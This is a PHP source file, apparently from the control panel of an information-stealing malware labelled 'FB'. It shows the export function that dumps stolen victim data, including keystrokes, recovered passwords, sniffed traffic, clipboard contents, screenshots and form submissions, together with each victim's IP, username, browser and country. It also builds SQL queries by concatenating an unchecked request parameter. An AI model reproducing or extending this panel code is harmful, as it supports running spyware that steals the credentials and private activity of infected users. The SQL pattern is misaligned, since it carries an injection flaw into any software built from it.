<?php
//FUNCTIONS ///////////////////////////////////////////////////////////////////
function exportLogs($fb, $logType)
{
    if( !$logType ) 
    { 
        $err = $fb->panel->str['err']['unerr'];
        show($fb->panel->str['bodyHeader'].$err.$fb->str['footer']."</div>", $err); exit(); 
    }
    
    $number = 1;
    $Country = '';
    $output = NULL;
    $result = array();
    $misc = misc_str();
    getBrowsers_str($fb);
    getCountries_str($fb);
    $headName = $fb->panel->str['pageHead'];
    $headName['all_logs'] = "FB";
    $tableName = array("logs","keystrokes","recoveries","sniffs","clipboard","junk","screenshots");
    
    if ( substr($logType,0,4) == "exp_") {
        $logType = substr($logType, 4); //remove exp_
    }
    
    if( !Perm(2) ) { header("Location: ".server('HTTP_REFERER')); exit(); }
    header("Content-Disposition: attachment; filename=\"".$headName[$logType].".txt\"");
    header("Content-Type: application/force-download");
    
    if( has_post("selectact") )
    {
        $selArray = aray("sel");
        $tableName[0] = $logType;
        
        $result[0] = select_id_list($fb, $logType, $selArray);
    }
    elseif($logType != "all_logs")
    {
        $tableName[0] = $logType;
        $result[0] = mysqli_query($fb->mysql, "SELECT * FROM `".$logType."` WHERE 1");
    }
    else {
        for ($i = 0; $i < count($tableName); $i++)
        {
            $result[$i] = mysqli_query($fb->mysql, "SELECT * FROM `".$tableName[$i]."` WHERE 1");
        }
    }
    
    for ($i = 0; $i < count($result); $i++)
    {
        while( $row = mysqli_fetch_array($result[$i]) )
        {
            echo $headName[$tableName[$i]]."\r\n";
            echo "////////////////////\r\n";
            
            if( $tableName[$i] == "logs") { 
                echo $misc['browser'].": ".$fb->panel->str['Browsers'][$row['browser']]."\r\n"; 
                echo $misc['host'].": ".$row['host']."\r\n";
                if( isset($row["agent"]) ){ echo "User-Agent: ".$row['agent']."\r\n"; }
            }
            
            if( array_key_exists("countryNumber", $row) ){ $Country = $row["countryNumber"]; }
            
            echo $misc['user'].": " . $row['user'] . "\r\n";
            echo $misc['date'].": " . $row['date'] . "\r\n";
            echo $misc['country'].": " . getCountry($Country) . "\r\n";//country
            echo $misc['ip'].": " . $row['ip'] . "\r\n".$misc['content'].":\r\n";
            if( $tableName[$i] == "logs")
            {
                parse_str( utf8_str($row['content']), $output);
                foreach ($output as $key => $value) 
                {
                    if ($value != '')
                    {
                        echo $key . "=" . $value ."\r\n";
                    }
                }
            }
            elseif( $tableName[$i] == "screenshots") 
            { 
                echo $row['content'].".jpeg\r\n";
            }
            else { echo $row['content']."\r\n"; }
        
            echo "////////////////No.".$number++."/////////////\r\n\r\n\r\n";
        }
    }
}

function Export($fb)
{
    $fb->panel->png = getPNGs();
    $fb->panel->str['misc'] = misc_str();
    $export = $fb->panel->str['pageHead']['export'];
    
    $im = "<tr>";
    $exportHead = "<span class='btn' style='color:#990012'>";
    $ls = "<td> <li><a href='?action=exp_";
    $li = "</span></a></li> </td>";
    $List = array('logs','keystrokes','recoveries','sniffs','clipboard','junk','all_logs');
    $ph_str = $fb->panel->str['pageHead']; $ph_str['all_logs'] = "All Logs";
    
    $html = " <ul class='nav nav-tabs'>  <table style='width:80%;'> <tr>";
    for ($i = 0; $i < count($List); $i++)
    {
        $html .= $ls.$List[$i]."'>".$exportHead.$export." ".$ph_str[$List[$i]].$li;
        $im .= "<td>".$fb->panel->png[$List[$i]]."</td>";
    }
    $html .= "</tr>".$im."</tr> </table> </ul>";
    
    show($fb->panel->str['bodyHeader'].$html.$fb->str['footer']."</div>", $ph_str['export']);
}